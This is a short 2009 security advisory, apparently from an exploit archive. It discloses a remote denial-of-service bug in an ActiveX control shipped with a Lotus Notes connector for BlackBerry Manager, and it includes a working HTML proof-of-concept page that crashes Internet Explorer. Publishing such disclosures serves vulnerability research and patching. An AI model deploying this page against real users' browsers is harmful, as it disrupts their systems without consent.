Lotus note connector for Blackberry Manager 5.0.0.11 ActiveX DoS Vuln

2009-08-25 14:39:05

#####################################################################################

Application: Lotus note connector for Blackberry Manager 5.0.0.11 (And maybe other application that use it..)

Platforms: Windows XP Professional French SP2 and SP3

crash: IE 8.0.6001.18702
IE 6.0.2900.2180

Exploitation: remote DoS

Date: 2009-08-24

Author: Francis Provencher (Protek Research Lab's)


#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code

#####################################################################################

===============
1) Introduction
===============

Notes Connector is an easy to use tool that allows you to instantly synchronize all your Lotus Notes email.

#####################################################################################

============================
2) Technical details
============================

Name: lnresobject.dll
Ver.: 7.1.1.119
CLSID: {158CD9E8-E195-4E82-9A78-0CF6B86B3629}



#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;


<html><body>
<object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object>
</body></html>

#####################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.